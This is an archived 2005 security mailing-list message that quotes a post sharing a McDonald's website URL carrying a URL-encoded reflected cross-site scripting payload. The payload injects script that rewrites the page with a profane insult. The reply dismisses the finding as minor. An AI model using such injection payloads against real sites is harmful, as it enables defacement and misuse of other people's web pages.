Open Source and information security mailing list archives
Message-ID: <4274F756.3080700@securinews.com>
Date: Sun May  1 16:36:08 2005
From: seclists at securinews.com (Paul Kurczaba)
Subject: Micky-dee's anyone?

Just another case of cross site scripting. I would understand people 
caring if it was a bank's site...but McDonalds?

tuytumadre@....net wrote:
> To all you people that like McDonalds, here is a quick link that may 
> show you the light:
>  
> http://www.mcdonalds.com/app_controller.bumper.bumper.html?_continue=%29%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%73%74%79%6C%65%2E%62%61%63%6B%67%72%6F%75%6E%64%3D%22%77%68%69%74%65%22%3B%73%65%74%54%69%6D%65%6F%75%74%28%22%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%62%3E%3C%63%65%6E%74%65%72%3E%3C%62%72%3E%3C%62%72%3E%44%6F%6E%74%20%65%61%74%20%4D%63%44%6F%6E%61%6C%64%73%20%79%6F%75%20%66%61%74%20%66%75%63%6B%21%27%29%22%29%3B%3C%2F%73%63%72%69%70%74%3E
>  
> Interesting, huh?
>  
> Regards,
> Pauil
